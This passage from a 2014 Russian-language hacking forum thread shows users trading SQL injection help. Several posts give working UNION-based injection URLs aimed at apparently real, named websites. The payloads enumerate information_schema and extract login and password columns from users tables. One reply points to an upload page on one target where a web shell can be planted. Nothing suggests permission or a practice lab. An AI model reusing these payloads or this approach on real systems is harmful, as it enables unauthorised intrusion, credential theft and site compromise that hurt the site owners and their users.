HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.01.2014, 15:30
Unknown
Guest
Сообщений: n/a
Провел на форуме:
15642

Репутация: 6
По умолчанию

Цитата:
Сообщение от psihoz26  
psihoz26 said:
Посоветуйте пожалуйста нормальный гуи для sqlmap
Особенно важна поддержка иньекций в куках
В разделе ИЗБРАННОЕ смотрел?
 
Ответить с цитированием

  #2  
Старый 20.01.2014, 18:50
erwap
Guest
Сообщений: n/a
Провел на форуме:
20084

Репутация: 0
По умолчанию

Почему, когда пытаюсь сдампить бд, некоторые поля сохраняются пустыми?

Пробовал Havij и sqlmap
 
Ответить с цитированием

  #3  
Старый 20.01.2014, 18:57
Unknown
Guest
Сообщений: n/a
Провел на форуме:
15642

Репутация: 6
По умолчанию

Цитата:
Сообщение от erwap  
erwap said:
Почему, когда пытаюсь сдампить бд, некоторые поля сохраняются пустыми?
Пробовал Havij и sqlmap
Уверен,что там есть данные?ручками пробовал?
 
Ответить с цитированием

  #4  
Старый 21.01.2014, 11:54
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию

Цитата:
Сообщение от erwap  
erwap said:
Почему, когда пытаюсь сдампить бд, некоторые поля сохраняются пустыми?
Пробовал Havij и sqlmap
А вы таки вообще уверены, что в записях с этими полями поля по факту не пустые? И какие у вас привилегии на системе?
 
Ответить с цитированием

  #5  
Старый 21.01.2014, 18:49
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Есть сайт со скулей

Код:
Code:
http://kerch.biz/news/view.php?id=-328+union+/*!select*/+1,2,3,concat%28login,0x3a,password%29,5,6+FROM+users+--+
и админка но ни одна из учёток не подходит. Расскажите, в чём подвог?

2. Не подбирается кол-во столбцов.

Код:
Code:
www.tmk-group.com/structure.php?flr_id=179+and+1=0+order+by+1+--+
 
Ответить с цитированием

  #6  
Старый 21.01.2014, 19:11
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:
Есть сайт со скулей
Код:
Code:
http://kerch.biz/news/view.php?id=-328+union+/*!select*/+1,2,3,concat%28login,0x3a,password%29,5,6+FROM+users+--+
и
админка
но ни одна из учёток не подходит. Расскажите, в чём подвог?
http://kerch.biz/upload.php

Спокойно шелл грузится.
 
Ответить с цитированием

  #7  
Старый 22.01.2014, 01:05
imprenko
Guest
Сообщений: n/a
Провел на форуме:
2871

Репутация: 0
По умолчанию

подскажите по базе SAP MaxDB

не могу найти статей про это базу как скуль ижект делать в ней.

блинд
 
Ответить с цитированием

  #8  
Старый 22.01.2014, 21:37
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

В общем есть проблемная скуля

Код:
Code:
http://www.sevseun.com/downloads.php?page_id=-1075%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
На которой видны пинтабельные поля, но получить от них что-либо (нр. version() ) выбивает чистую страницу. Расскажите, что за фигня!
 
Ответить с цитированием

  #9  
Старый 23.01.2014, 00:40
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Цитата:
Сообщение от OxoTnik  
OxoTnik said:
http://www.sevseun.com/downloads.php?page_id=-1075%27+union+select+1,2,@@version,4,5,6,7,8,9,10, 11,12,13,14,15,16+--+
http://www.sevseun.com/downloads.php?page_id=-1075%27+union+select+1,2,3,4,tabLe_name,6,7,8,9,10 ,11,12,13,14,15,16++from+information_scheMa.tables--+
// Остальные ответы удалил, так как мы все дублировали этот пост =) Да, там фильтруются скобки

// BigBear

Спасибо ребятулечки, но там другая фигня получилась.

Код:
Code:
http://www.sevseun.com/downloads.php?page_id=-1075%27+union+select+1,2,3,4,Column_name,6,7,8,9,10,11,12,13,14,15,16+from+information_scheMa.columns+where+table_name=%27users%27+limit+2,1+--+
вообщем есть столбец username & password, но туда не пускает, мб зарегистрироваться надо. А насчёт скобок тоже отдельное спасибо, но можно поочередно вытянуть используя их.

II.

Код:
Code:
http://fmf.npi-tu.ru/index.php?id=3+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
- не выводит пентабельное поле.
 
Ответить с цитированием

  #10  
Старый 23.01.2014, 01:08
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:
Спасибо ребятулечки, но там другая фигня получилась.
Код:
Code:
http://www.sevseun.com/downloads.php?page_id=-1075%27+union+select+1,2,3,4,Column_name,6,7,8,9,10,11,12,13,14,15,16+from+information_scheMa.columns+where+table_name=%27users%27+limit+2,1+--+
вообщем есть столбец username & password, но туда не пускает, мб зарегистрироваться надо. А насчёт скобок тоже отдельное спасибо, но можно поочередно вытянуть используя их.
II.
Код:
Code:
http://fmf.npi-tu.ru/index.php?id=3+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
- не выводит пентабельное поле.
Зачем регистрироватся, если ты работаешь с БД ?

Table 'sevseun.users' doesn't exist

Нету прав у юзера на доступ к этой таблице.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ